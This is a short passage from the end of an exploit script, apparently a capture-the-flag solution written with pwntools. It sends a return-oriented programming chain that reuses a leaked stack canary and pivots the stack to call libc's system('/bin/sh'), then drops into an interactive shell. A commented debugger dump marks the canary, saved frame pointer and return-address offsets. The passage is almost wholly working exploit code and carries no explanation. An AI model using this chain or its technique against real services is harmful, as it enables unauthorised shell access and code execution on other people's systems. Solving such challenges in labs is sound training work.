p.sendafter(b"Did you read what you wanted to read?\n", flat(0, pop_rdi+1, pop_rdi, bin_sh, libc.sym['system'],canary, stack-0x30, leave_ret)[1:])
#gdb.attach(p)
#pause()

p.interactive()

'''
0x00007fffffffdcb8│+0x0228: 0x90f6c47616335500                     <------ 75 canary
0x00007fffffffdcc0│+0x0230: 0x00007fffffffdd10  →  0x00007fffffffde30  ← $rbp   <-------- 76 
0x00007fffffffdcc8│+0x0238: 0x0000555555555a45  →  <menu+154> mov DWORD PTR [rbp-0x24], eax   <------- 77 elf
0x00007fffffffded8│+0x0448: 0x00007ffff7c29e40  →  <__libc_start_main+128>                    <------- 
'''
